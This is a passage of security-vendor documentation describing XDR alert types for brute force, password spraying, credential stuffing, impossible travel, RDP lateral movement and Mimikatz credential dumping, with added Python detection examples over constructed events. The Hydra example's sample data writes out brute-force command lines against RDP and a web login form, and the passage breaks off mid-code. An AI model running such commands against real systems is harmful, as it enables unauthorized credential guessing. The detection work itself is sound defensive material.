- event_summary.total_failed — number of failed logins in the period
- event_summary.total_successful — number of successful logins in the period
- event_summary.total_fail_ratio — percent of failed logins in the period, which is event_summary.total_failed / (event_summary.total_failed + event_summary.total_successful)
- accumulated_anomalous_failures — score value of the model indicating the degree of abnormal activity
- login_type — type of login, such as ssh_traffic, okta_log, or aws_cloudtrail
- srcip_host — source host name
- srcip_reputation — source reputation
Use Case with Data Points
Login failures and successes are calculated periodically for every source (srcip) and destination (dstip) IP address. If the number of failures is significantly larger than the number of successes, an alert is triggered. The Interflow includes the login type (login_type), source host (srcip_host), and source reputation (srcip_reputation).
Hydra Password Guessing Hack Tool
A user on a Windows host executed a command-line script that launched either the hydra.exe command or a command using known Hydra style parameters, which may be an inappropriate use of the Hydra password guessing tool.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [Hydra]
Event Name
The xdr_event.name for this alert type in the Interflow data is hydra_password_guessing_hack_tool.
Key Fields and Relevant Data Points
- hostip — device internal IP address
- event_data.Image — process image running hydra.exe for password cracking
- event_data.CommandLine — command used to run the tool
- computer_name — name of the Windows host
Use Case with Data Points
This alert is triggered when a Windows host (hostip) runs a command-line or PowerShell script whose process image (event_data.Image) or command line (event_data.CommandLine) indicates use of the Hydra password guessing hack tool: an image named hydra.exe, or a command carrying one or more Hydra-style parameters. The Interflow includes the IP address of the Windows host (hostip), the host name (computer_name), and the script image (event_data.Image) or script payload (event_data.CommandLine).
Validation / Remediation
Check the command line or the body of the script that is reported on the Windows host to identify whether it is actually malicious; the parameter match alone is not conclusive, because the same flags appear in ordinary administrative commands. If malicious, consider quarantining the host.
Potential False Positives
The running of any executable named hydra.exe, or of any command whose parameters include both -u and -p, or both ^user^ and ^pass^, triggers this alert. Note that -u and -p are common option names for many legitimate command-line clients (database and HTTP clients, for example), so expect benign hits from administrative scripts.
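The trigger conditions and the false positive just described, as an added example (not Stellar Cyber's code): a small matcher that applies the documented indicators to constructed Sysmon-style process events. The field names follow the Interflow fields above; the sample events, the mysql.exe false positive and the renamed-binary case are constructed for illustration.

```python
"""Added example (not Stellar Cyber code): a matcher for the documented Hydra
triggers, run over constructed Sysmon-style process events.

Triggers mirror the text: an image named hydra.exe, or a command line carrying
both -u and -p, or both ^USER^ and ^PASS^ placeholders. The mysql.exe sample is
the documented false positive: ordinary clients also take -u and -p.
"""
import re
import shlex
from pathlib import PureWindowsPath

# Hydra's credential placeholders for service modules such as http-post-form
PLACEHOLDER_RE = re.compile(r"\^(user|pass)\^", re.IGNORECASE)


def hydra_indicators(image: str, command_line: str) -> list[str]:
    """Return the indicators found in one process event; an empty list means no alert."""
    found = []
    if PureWindowsPath(image).name.lower() == "hydra.exe":
        found.append("image:hydra.exe")
    try:
        argv = shlex.split(command_line, posix=False)   # keep Windows quoting intact
    except ValueError:                                   # unbalanced quotes: fall back
        argv = command_line.split()
    flags = {a for a in argv if a.startswith("-")}
    if {"-u", "-p"} <= flags:
        found.append("flags:-u,-p")
    placeholders = {m.lower() for m in PLACEHOLDER_RE.findall(command_line)}
    if placeholders == {"user", "pass"}:
        found.append("placeholders:^USER^,^PASS^")
    return found


# Constructed sample events (hostip, computer_name, event_data.Image, event_data.CommandLine)
SAMPLE_EVENTS = [
    {"hostip": "10.1.2.3", "computer_name": "WS01",
     "event_data": {"Image": r"C:\Tools\hydra.exe",
                    "CommandLine": "hydra.exe -L users.txt -P pass.txt rdp://10.1.2.50"}},
    {"hostip": "10.1.2.4", "computer_name": "WS02",   # benign: MySQL client, documented false positive
     "event_data": {"Image": r"C:\Program Files\MySQL\bin\mysql.exe",
                    "CommandLine": "mysql.exe -u root -p inventory"}},
    {"hostip": "10.1.2.5", "computer_name": "WS03",   # renamed binary, but Hydra placeholders
     "event_data": {"Image": r"C:\Windows\System32\cmd.exe",
                    "CommandLine": 'cmd.exe /c h.exe -l admin -P p.txt 10.1.2.50 '
                                   'http-post-form "/login:user=^USER^&pass=^PASS^:F=failed"'}},
    {"hostip": "10.1.2.6", "computer_name": "WS04",   # benign
     "event_data": {"Image": r"C:\Windows\System32\notepad.exe",
                    "CommandLine": "notepad.exe notes.txt"}},
]


def evaluate(events):
    """Produce one alert-style record per event that matches a Hydra indicator."""
    alerts = []
    for ev in events:
        indicators = hydra_indicators(ev["event_data"]["Image"], ev["event_data"]["CommandLine"])
        if indicators:
            alerts.append({"xdr_event.name": "hydra_password_guessing_hack_tool",
                           "hostip": ev["hostip"], "computer_name": ev["computer_name"],
                           "indicators": indicators})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The WS02 record shows why the validation step matters: the flag rule fires on a database client, while the WS03 record shows that renaming the binary does not hide the ^USER^/^PASS^ placeholders that Hydra's form modules require.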
Impossible Travel Anomaly
A user logged in from locations that are geographically impossible to travel between in the time frame. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] XDR UBA (XTA0004)
- Technique: XDR Location Anomaly (XT2001)
- Tags: [User Behavior Analytics]
Event Name
The xdr_event.name for this alert type in the Interflow data is user_impossible_travel.
Key Fields and Relevant Data Points
- srcip_usersid — source user ID
- srcip_username — source user name
- srcip — source IP address
- srcip_geo — source IP address geo location, including latitude and longitude
- distance_deviation — deviation in distance (miles) between the two login locations
- time_deviation — deviation in time (seconds) between the two login events
- travel_speed — calculated speed for the user to travel between the two locations (miles/hour)
- appid_name — application name for the login event
- last_login_time — time of the 2nd login, event 2 (E2)
- _id2 — ID of E2
- _index2 — index of E2
- srcip2 — source IP address of E2
- srcip_geo2 — source IP address geo location of E2, including latitude and longitude
- engid_gateway — gateway IP address, used to determine geo location when the source IP address is private
Use Case with Data Points
Login events (E1 and E2) are examined for a user (srcip_usersid) to see whether the login locations (srcip_geo and srcip_geo2), when they are at least 100 miles apart, changed faster (travel_speed = distance_deviation / time_deviation) than is possible at the typical commercial flight speed of 600 miles/hour.
E1 is the basis for the Interflow. The srcip_usersid and srcip_username identify the user, appid_name identifies the application, and last_login_time identifies the time when the 2nd login event happened. You can find detailed information about E2 by checking _id2 in _index2, its source IP address (srcip2), and its geo location (srcip_geo2). When triaging, compare appid_name and the two source addresses first: corporate VPN exits and cloud proxy egress points place a user at the provider's location, and are a common source of benign hits.
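The travel_speed comparison above, as an added example (not Stellar Cyber's code): two login events for one user are compared using the thresholds the text gives. The page does not say how distance_deviation is measured, so the haversine great-circle distance is an assumption here, and the login records (New York followed by London, Philadelphia or Chicago) are constructed.

```python
"""Added example (not Stellar Cyber code): the impossible-travel comparison
between two login events, E1 and E2, for one srcip_usersid.

The page states the thresholds (locations at least 100 miles apart, faster
than 600 miles/hour) but not how distance_deviation is measured; the haversine
great-circle distance used here is an assumption. The login records are
constructed samples.
"""
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_MILES = 3958.8
MIN_DISTANCE_MILES = 100.0     # from the text
MAX_PLAUSIBLE_MPH = 600.0      # typical commercial flight speed, from the text


def haversine_miles(lat1, lon1, lat2, lon2):
    """Great-circle distance in miles between two latitude/longitude points."""
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * EARTH_RADIUS_MILES * asin(sqrt(a))


def impossible_travel(e1, e2):
    """Return an alert-style record if E1 -> E2 needed more than flight speed, else None."""
    distance = haversine_miles(e1["lat"], e1["lon"], e2["lat"], e2["lon"])
    seconds = (e2["time"] - e1["time"]).total_seconds()
    if distance < MIN_DISTANCE_MILES or seconds <= 0:
        return None                      # nearby logins, or E2 not after E1: never alert
    speed_mph = distance / (seconds / 3600.0)
    if speed_mph <= MAX_PLAUSIBLE_MPH:
        return None
    return {
        "xdr_event.name": "user_impossible_travel",
        "srcip_usersid": e1["srcip_usersid"],
        "srcip": e1["srcip"], "srcip_geo": (e1["lat"], e1["lon"]),
        "srcip2": e2["srcip"], "srcip_geo2": (e2["lat"], e2["lon"]),
        "distance_deviation": round(distance, 1),   # miles
        "time_deviation": int(seconds),             # seconds
        "travel_speed": round(speed_mph, 1),        # miles/hour
        "last_login_time": e2["time"].isoformat(),
    }


def _login(srcip, lat, lon, hour, minute=0):
    """Constructed login record for one user on 2024-01-15 (UTC)."""
    return {"srcip_usersid": "S-1-5-21-1-2-3-1001", "srcip": srcip, "lat": lat, "lon": lon,
            "time": datetime(2024, 1, 15, hour, minute, tzinfo=timezone.utc)}


E1 = _login("203.0.113.10", 40.7128, -74.0060, 9)                 # New York, 09:00
E2_LONDON = _login("198.51.100.20", 51.5074, -0.1278, 10)         # London, one hour later
E2_PHILADELPHIA = _login("203.0.113.11", 39.9526, -75.1652, 10)   # about 80 miles: under the 100-mile floor
E2_CHICAGO = _login("192.0.2.30", 41.8781, -87.6298, 12)          # about 710 miles in 3 hours: under 600 mph


def check_samples():
    """Run the three E2 candidates against E1; London is the only impossible one."""
    return {"london": impossible_travel(E1, E2_LONDON),
            "philadelphia": impossible_travel(E1, E2_PHILADELPHIA),
            "chicago": impossible_travel(E1, E2_CHICAGO)}


if __name__ == "__main__":
    for name, result in check_samples().items():
        print(name, result)
```

The order check (seconds <= 0) is the reason the text warns about event order: if a high-latency source delivers E1 after E2, the pair has to be re-sorted by login time before the speed is meaningful.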
Internal Account Login Failure Anomaly
An anomalously large number of login failures from an internal source IP address to an internal destination IP address was observed for an account. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [Internal]
Event Name
The xdr_event.name for this alert type in the Interflow data is internal_cloud_account_login_failure.
Key Fields and Relevant Data Points
- srcip_usersid — account user ID, or
- srcip_username — account user name, enriched from event_data.targetusername
The key field for this alert type can be either srcip_usersid or srcip_username, depending on the data feed.
- event_summary.total_failed — number of failed logins in the period
- event_summary.total_successful — number of successful logins in the period
- event_summary.total_fail_ratio — percent of failed logins in the period, computed as event_summary.total_failed / (event_summary.total_failed + event_summary.total_successful)
- accumulated_anomalous_failures — score value of the model indicating the degree of abnormal activity
- srcip_host — host name of corresponding source IP address
- login_type — type of login
- srcip_reputation — source reputation
Use Case with Data Points
Login failures and successes between any internal IP addresses are calculated periodically for every account (srcip_usersid). If the number of failures is significantly larger than the number of successes, an alert is triggered. A sample Interflow includes the login type (login_type), source host (srcip_host), and source reputation (srcip_reputation).
Internal Brute-Forced Successful User Login
A successful login was observed from an IP address that had previously seen a large number of login failures, or a successful login to a user account was observed from another IP address or IP addresses that had previously seen a large number of login failures to that account. Check with the user.
This alert type has two subtypes, source IP-based and user ID-based, described below.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [Internal]
Event Name
The xdr_event.name for this alert type in the Interflow data is internal_user_success_brute_forcer.
Alert Subtype: Source IP-Based
The source IP-based alert subtype has the same XDR Kill Chain and Event Name as the user ID-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
- srcip — source IP address
- srcip_usersid — Windows SID associated with the source IP address
- srcip_host — source host name
- srcip_reputation — source reputation
- srcip_geo.countryName — source country
- dstip_host — destination host name
- login_type — type of login
- username — user name
- related_alert._id — link to the related Internal User Login Failure Anomaly
Use Case with Data Points
The login records to an internal IP address (dstip) are checked for every internal source IP address (srcip). An alert is triggered if that IP address:
- Has so many failed login attempts that it triggered the Internal User Login Failure Anomaly, and
- Had a successful login
A sample Interflow includes the source IP address (srcip), login type (login_type), source host name (srcip_host), source reputation (srcip_reputation), source country (srcip_geo.countryName), and user name (username).
Alert Subtype: User ID-Based
The user ID-based alert subtype has the same XDR Kill Chain and Event Name as the source IP-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
- srcip — source IP address
- srcip_usersid — Windows SID of the user account
- srcip_host — source host name
- srcip_reputation — source reputation
- srcip_geo.countryName — source country
- dstip_host — destination host name
- login_type — type of login
- username — user name
- related_alert._id — link to the related Internal Account Login Failure Anomaly
Use Case with Data Points
The login records to a user account (srcip_usersid) are checked for every internal source IP address (srcip). An alert is triggered if that user account:
- Has so many failed login attempts that it triggered the Internal Account Login Failure Anomaly, and
- Had a successful login
A sample Interflow includes the source IP address (srcip), login type (login_type), source host name (srcip_host), source reputation (srcip_reputation), source country (srcip_geo.countryName), and user name (username).
Internal Password Spraying
An anomalously large number of failed logins with unknown user names was observed on internal Windows authentication services. Check the activity after successful logins, and consider blocking the internal source IP addresses.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Sub-technique: Password Spraying (T1110.003)
- Tags: [Internal]
Event Name
The xdr_event.name for this alert type in the Interflow data is internal_password_spray.
Key Fields and Relevant Data Points
- srcip — source IP address generating a failed login, or
- event_data.Workstation — workstation generating a failed login
The key field for this alert type can be either srcip or event_data.Workstation, depending on the data feed.
- event_data.WorkstationName — workstation associated with the alerting srcip (when applicable)
- event_id — Windows event ID corresponding to the login failures
- login_type — type of login; the available values vary by event_id
- actual — actual number of failed logins with unknown user names in a 5-minute period
- typical — typical number of failed logins with unknown user names in a 5-minute period
- password_spray_user_summary — list of up to 100 unknown user names associated with the failed logins (the first three are shown in the alert description)
Use Case with Data Points
If a potential password spraying attack is observed, an alert is triggered. The Interflow includes a source (srcip or event_data.Workstation), timestamp, the type of login (login_type), the number of failed logins (actual), the usual number of failed logins (typical), and a sampling of the user names used in the attack (password_spray_user_summary).
Internal Credential Stuffing
An anomalously large amount of username/password testing was detected on an internal Windows authentication service. Check the activity after successful logins, and consider blocking the internal source IP addresses.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [Internal]
Event Name
The xdr_event.name for this alert type in the Interflow data is internal_credential_stuffing.
Key Fields and Relevant Data Points
- msg_class — Microsoft-Windows-Security-Auditing for Windows
- service_id — specific account ID of a service
- login_failure_rate — rate of login failures per minute in the period
- unknown_users_rate — rate of unknown user names per minute in the period
- unknown_users_to_login_failures — ratio of unknown user names to login failures in the period
- suspicious_ips — suspicious source IP addresses (up to 100)
- possible_breached_ips — list of malicious IP addresses that may have successful breach activities
Use Case with Data Points
Internal credential stuffing is the constant testing of username/password combinations on the AWS, Okta, or Windows authentication functions. Login activity is monitored and if the number of failed logins is larger than normal for that service, an alert is triggered. The Interflow includes the service (msg_class), the tenant's account ID on that service (service_id), suspicious source IP addresses (suspicious_ips), the login failure rate (login_failure_rate), the unknown user rate (unknown_users_rate), the ratio of unknown users to login failures (unknown_users_to_login_failures), and a list of source IP addresses that might have succeeded and should be investigated first (possible_breached_ips).
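The statistics behind the two preceding alert types (the actual/typical unknown-user counts per 5-minute window for Internal Password Spraying, and the per-service rates and IP lists for Internal Credential Stuffing), as an added example that is not Stellar Cyber's code. It runs over constructed Windows Security events. Two things are assumptions rather than page content: that an unknown user name is recognised from the 4625 SubStatus 0xC0000064 (Microsoft's "user name does not exist" code), and that typical is the median of the same source's earlier windows.

```python
"""Added example (not Stellar Cyber code): the spraying and stuffing statistics
described above, computed over Windows Security events in 5-minute windows.
It serves both the Internal Password Spraying and Internal Credential Stuffing
use cases.

Failed logons are event_id 4625. An unknown user name is recognised by
SubStatus 0xC0000064 (Microsoft's "user name does not exist" status), which is
an assumption about how the platform separates unknown users from bad
passwords; 'typical' is taken as the median of that source's earlier windows,
also an assumption. All events are constructed samples.
"""
from collections import Counter, defaultdict
from statistics import median

WINDOW = 300                  # seconds: the 5-minute period named in the text
UNKNOWN_USER = "0xC0000064"   # 4625 SubStatus: user name does not exist
BAD_PASSWORD = "0xC000006A"   # 4625 SubStatus: wrong password for a real user


def spray_windows(events):
    """Per (source, 5-minute bucket): failures with unknown user names, and those names."""
    buckets = defaultdict(lambda: {"actual": 0, "users": []})
    for ev in events:
        if ev["event_id"] == 4625 and ev["SubStatus"] == UNKNOWN_USER:
            b = buckets[(ev["source"], ev["ts"] // WINDOW)]
            b["actual"] += 1
            b["users"].append(ev["TargetUserName"])
    return buckets


def spray_alerts(events, min_unknown=10, ratio=5):
    """Flag a window whose unknown-user failures dwarf that source's earlier windows (thresholds assumed)."""
    history, alerts = defaultdict(list), []
    for (source, bucket), b in sorted(spray_windows(events).items(), key=lambda kv: kv[0][1]):
        typical = median(history[source]) if history[source] else 0
        if b["actual"] >= min_unknown and b["actual"] > ratio * max(typical, 1):
            alerts.append({"xdr_event.name": "internal_password_spray", "source": source,
                           "actual": b["actual"], "typical": typical,
                           "password_spray_user_summary": sorted(set(b["users"]))[:100]})
        history[source].append(b["actual"])
    return alerts


def stuffing_metrics(events, t_start, t_end):
    """Service-wide rates over [t_start, t_end), plus which failing sources later logged on successfully."""
    minutes = max((t_end - t_start) / 60.0, 1.0 / 60.0)
    fails = [e for e in events if e["event_id"] == 4625 and t_start <= e["ts"] < t_end]
    unknown = [e for e in fails if e["SubStatus"] == UNKNOWN_USER]
    first_fail = {}
    for e in fails:
        first_fail.setdefault(e["source"], e["ts"])
    by_source = Counter(e["source"] for e in fails)
    breached = sorted({e["source"] for e in events if e["event_id"] == 4624
                       and e["source"] in first_fail and e["ts"] > first_fail[e["source"]]})
    return {
        "msg_class": "Microsoft-Windows-Security-Auditing",
        "login_failure_rate": len(fails) / minutes,
        "unknown_users_rate": len({e["TargetUserName"] for e in unknown}) / minutes,
        "unknown_users_to_login_failures": len(unknown) / len(fails) if fails else 0.0,
        "suspicious_ips": [s for s, _ in by_source.most_common(100)],
        "possible_breached_ips": breached,
    }


def _fail(source, ts, user, substatus):
    return {"event_id": 4625, "source": source, "ts": ts, "TargetUserName": user, "SubStatus": substatus}


def build_samples():
    """Constructed timeline (ts in seconds): a quiet baseline, a spray from two hosts, then one success."""
    ev = [_fail("WS-ADMIN", b * WINDOW + 10, "jsmtih", UNKNOWN_USER) for b in range(3)]   # one typo per window
    ev += [_fail("10.0.0.77", 1200 + i, f"user{i + 1:03d}", UNKNOWN_USER) for i in range(30)]
    ev += [_fail("10.0.0.77", 1300 + i, "jsmith", BAD_PASSWORD) for i in range(5)]
    ev += [_fail("10.0.0.78", 1250 + i, f"u{i + 1:02d}", UNKNOWN_USER) for i in range(12)]
    ev.append({"event_id": 4624, "source": "10.0.0.77", "ts": 1600, "TargetUserName": "jsmith", "SubStatus": None})
    return ev


if __name__ == "__main__":
    sample = build_samples()
    print(spray_alerts(sample))
    print(stuffing_metrics(sample, 1200, 1500))
```

Keeping bad-password failures (0xC000006A) out of actual is what separates a spray of guessed names from a single user fumbling a password; the same split drives unknown_users_to_login_failures, which stays high for stuffing with harvested lists and low for a locked-out employee.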
Internal RDP BlueKeep
Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to BlueKeep (CVE-2019-0708) between internal hosts. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Privilege Escalation (TA0004)
- Technique: Exploitation for Privilege Escalation (T1068)
- Tags: [Internal; RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is internal_rdp_bluekeep.
Key Fields and Relevant Data Points
- ids.signature — IDS signature
- srcip_host — source host name
- dstip_host — destination host name
Use Case with Data Points
If the scanner by zerosum0x0 is used, an alert is triggered. A sample Interflow includes the IDS signature (ids.signature), source host (srcip_host), and destination host (dstip_host). Because this is an IDS signature alert, the addresses inside the signature follow the direction of data flow; use the Interflow srcip to identify the host doing the scanning.
Internal RDP Suspicious Outbound
Non-standard tools on an internal host connecting to TCP port 3389 on another internal host were detected. This could indicate lateral movement attempting to establish an RDP connection. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Lateral Movement (TA0008)
- Technique: Remote Services (T1021)
- Tags: [Internal; RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is internal_rdp_suspicious_outbound.
Key Fields and Relevant Data Points
- srcip — source IP address of the host that connects to TCP port 3389 with a non-standard tool
- srcip_host — source host name
- process_name — process name
Use Case with Data Points
Connections to TCP port 3389 are monitored, and if non-standard tools connect, an alert is triggered. A sample Interflow includes the source IP address (srcip) and the process name (process_name). The following are the standard tools:
- mstsc.exe
- RTSApp.exe
- RTS2App.exe
- RDCMan.exe
- ws_TunnelService.exe
- RSSensor.exe
- RemoteDesktopManagerFree.exe
- RemoteDesktopManager.exe
- RemoteDesktopManager64.exe
- mRemoteNG.exe
- mRemote.exe
- Terminals.exe
- spiceworks-finder.exe
- FSDiscovery.exe
- FSAssessment.exe
- MobaRTE.exe
- chrome.exe
- thor.exe
- thor64.exe
Internal User Login Failure Anomaly
An anomalous number of login failures between internal IP addresses was observed for one of the following applications: SSH, SMTP, FTP, RDP, SMB, databases, Active Directory, Office 365, Okta, AWS CloudTrail, Google Workspace, Salesforce, or
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [Internal]
Event Name
The xdr_event.name for this alert type in the Interflow data is internal_user_login_fail.
Key Fields and Relevant Data Points
- srcip — source IP address
- dstip — destination IP address
- dstip_host — destination host name
- service_id — source domain, workstation, organization, or service
- event_summary.total_failed — number of failed logins in the period
- event_summary.total_successful — number of successful logins in the period
- event_summary.total_fail_ratio — percent of failed logins in the period, computed as event_summary.total_failed / (event_summary.total_failed + event_summary.total_successful)
- accumulated_anomalous_failures — score value of the model indicating the degree of abnormal activity
- login_type — type of login, such as ssh_traffic, okta_log, or aws_cloudtrail
- srcip_host — source host name
- srcip_reputation — source reputation
Use Case with Data Points
Login failures and successes between internal IP addresses are calculated periodically for every source (srcip) and destination (dstip) IP address. If the number of failures is significantly larger than the number of successes, an alert is triggered. The Interflow includes the login type (login_type), source host (srcip_host), and source reputation (srcip_reputation).
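The periodic summary that the user login failure anomalies (per source/destination pair, here and in the first entry of this group) and the Internal Account Login Failure Anomaly (per account) are built on, together with the internal/external classification from the note, as an added example that is not Stellar Cyber's code. event_summary.total_fail_ratio is computed exactly as the field description states. The page does not publish the model's decision rule (accumulated_anomalous_failures is a model score), so the MIN_FAILED and MIN_FAIL_RATIO thresholds are illustrative assumptions, and treating RFC 1918 plus loopback as the private ranges behind srcip_type/dstip_type is also an assumption. The login records are constructed.

```python
"""Added example (not Stellar Cyber code): the periodic login failure summary
behind the user login failure anomalies (per source/destination pair) and the
account login failure anomaly (per account), with the internal/external
classification from the note above.

event_summary.total_fail_ratio is computed exactly as documented:
total_failed / (total_failed + total_successful). The page does not publish
the model's decision rule (accumulated_anomalous_failures is a model score), so
MIN_FAILED and MIN_FAIL_RATIO are illustrative assumptions, and the private
ranges used for srcip_type/dstip_type are assumed to be RFC 1918 plus loopback.
The login records are constructed samples.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

MIN_FAILED = 20        # assumption: ignore tiny samples
MIN_FAIL_RATIO = 0.9   # assumption: "failures significantly larger than successes"

# ipaddress.is_private also counts documentation ranges such as 198.51.100.0/24 as
# private, so the check is spelled out against the ranges that matter here.
PRIVATE_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def ip_type(ip: str) -> str:
    """Mirror srcip_type / dstip_type: 'private' for internal ranges, else 'public'."""
    addr = ip_address(ip)
    return "private" if any(addr in net for net in PRIVATE_NETS) else "public"


def is_internal_pair(src: str, dst: str) -> bool:
    """Both ends private: the note's definition of an internal communication."""
    return ip_type(src) == "private" and ip_type(dst) == "private"


def summarize(events, key_fn):
    """Group login events by key_fn and compute the event_summary.* fields for each group."""
    groups = defaultdict(lambda: {"total_failed": 0, "total_successful": 0, "login_type": None})
    for ev in events:
        g = groups[key_fn(ev)]
        g["total_failed" if ev["outcome"] == "fail" else "total_successful"] += 1
        g["login_type"] = ev["login_type"]
    for g in groups.values():
        total = g["total_failed"] + g["total_successful"]
        g["total_fail_ratio"] = g["total_failed"] / total if total else 0.0
    return dict(groups)


def anomalous(summary) -> bool:
    return summary["total_failed"] >= MIN_FAILED and summary["total_fail_ratio"] >= MIN_FAIL_RATIO


def pair_alerts(events):
    """User login failure anomaly: one summary per (srcip, dstip), tagged internal or external."""
    alerts = []
    for (src, dst), s in summarize(events, lambda e: (e["srcip"], e["dstip"])).items():
        if anomalous(s):
            alerts.append({"scope": "internal" if is_internal_pair(src, dst) else "external",
                           "srcip": src, "dstip": dst, "event_summary": s})
    return alerts


def account_alerts(events):
    """Account login failure anomaly: one summary per account, over internal pairs only."""
    internal = [e for e in events if is_internal_pair(e["srcip"], e["dstip"])]
    return [{"xdr_event.name": "internal_cloud_account_login_failure",
             "srcip_username": user, "event_summary": s}
            for user, s in summarize(internal, lambda e: e["srcip_username"]).items() if anomalous(s)]


def _rep(n, **fields):
    return [dict(fields) for _ in range(n)]


def build_samples():
    """Constructed events (login_type values are illustrative): an internal brute force,
    an external one against an SSH server, and a user who mistyped a password three times."""
    return (
        _rep(45, srcip="10.0.0.5", dstip="10.0.0.20", srcip_username="svc_backup", login_type="windows_logon", outcome="fail")
        + _rep(2, srcip="10.0.0.5", dstip="10.0.0.20", srcip_username="svc_backup", login_type="windows_logon", outcome="success")
        + _rep(30, srcip="198.51.100.7", dstip="10.0.0.30", srcip_username="admin", login_type="ssh_traffic", outcome="fail")
        + _rep(3, srcip="10.0.0.9", dstip="10.0.0.20", srcip_username="alice", login_type="windows_logon", outcome="fail")
        + _rep(40, srcip="10.0.0.9", dstip="10.0.0.20", srcip_username="alice", login_type="windows_logon", outcome="success")
    )


if __name__ == "__main__":
    sample = build_samples()
    print(pair_alerts(sample))
    print(account_alerts(sample))
```

The ratio is what keeps alice quiet: three failures against forty successes is normal user behaviour, while the svc_backup pair and the external SSH source both fail almost every time. Note that the external source never appears in account_alerts, because that alert type only considers internal communications.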
Login Time Anomaly
A user logged in at an abnormal time. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] XDR UBA (XTA0004)
- Technique: XDR Time Anomaly (XT4005)
- Tags: [External; User Behavior Analytics]
Event Name
The xdr_event.name for this alert type in the Interflow data is user_login_time.
Key Fields and Relevant Data Points
- srcip_usersid — source user ID
- srcip_username — source user name
- srcip_host — host name of corresponding source IP address
- srcip_geo.countryName — source country
- dstip_host — host name of corresponding destination IP address
- actual — actual login time
- typical — typical login time
- actual_range — actual login time range
- typical_range — typical login time range
Use Case with Data Points
Every user's (srcip_usersid) login time (actual) is compared to the typical login times (typical_range). If it is outside the range, an alert is triggered. The Interflow includes information such as the source user name (srcip_username), source host name (srcip_host), and source country (srcip_geo.countryName), as well as the destination host (dstip_host).
Malware on Disk
Malicious software or a potentially unwanted application found on a device and reported as not cleaned. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] XDR Malware (XTA0006)
- Technique: XDR Miscellaneous Malware (XT6001)
- Tags: [Internal; Malware]
Event Name
The xdr_event.name for this alert type in the Interflow data is malware_on_disk.
Key Fields and Relevant Data Points
- hostip — IP address of the host
- file_path — file path
- computer_name — computer name
- malware_engine — malware engine, can be Sophos or Windows Defender
- group — type of malware
- type — status of malware
Use Case with Data Points
If either of the following occurs, an alert is triggered:
- Sophos engine indicates there is uncleaned malware
- Windows Defender indicates a failure or error when taking actions to protect the system
A sample Interflow includes the computer name (computer_name), malware engine (malware_engine), host IP address (hostip), path to the file (file_path), type of malware (group, for Sophos), and status of the malware (type, for Sophos).
Mimikatz Credential Dump
A potential Mimikatz memory dump was detected. Check the process to determine whether the host is compromised. Consider quarantining the host.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: OS Credential Dumping (T1003)
- Tags: [Internal]
Event Name
The xdr_event.name for this alert type in the Interflow data is mimikatz_mem_scan.
Key Fields and Relevant Data Points
- hostip — host IP address
- hostip_host — host name
- access_subject — process attempting access
- access_mask — mask that the process used to get access privileges (different access masks indicate different capabilities of the suspicious process)
Use Case with Data Points
If a process (access_subject) on a Windows host (hostip) opens lsass.exe with a special access mask (access_mask), an alert is triggered. The Interflow includes the IP address of the Windows host (hostip), the process performing the Mimikatz-style access (access_subject), and the access mask used to acquire the access privilege (access_mask).
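Reading the access_mask, as an added example that is not Stellar Cyber's code: the bit values are the Win32 PROCESS_* access rights, so the mask can be expanded into the capabilities the process asked for on lsass.exe. Which masks the platform considers "special" is not published on this page; the SUSPICIOUS_MASKS set (values commonly seen in LSASS dumping tools) and the choice to flag any handle carrying PROCESS_VM_READ are assumptions, and the Sysmon Event ID 10 style records are constructed.

```python
"""Added example (not Stellar Cyber code): decoding the access mask with which a
process opened lsass.exe, over constructed Sysmon Event ID 10 (ProcessAccess)
style records.

Bit values are the Win32 PROCESS_* access rights from winnt.h. Which masks the
platform treats as "special" is not published on this page; SUSPICIOUS_MASKS
holds values commonly associated with LSASS memory dumps and is an assumption,
as is treating any handle with PROCESS_VM_READ as worth an alert.
"""
from pathlib import PureWindowsPath

PROCESS_RIGHTS = {   # process-specific rights, winnt.h
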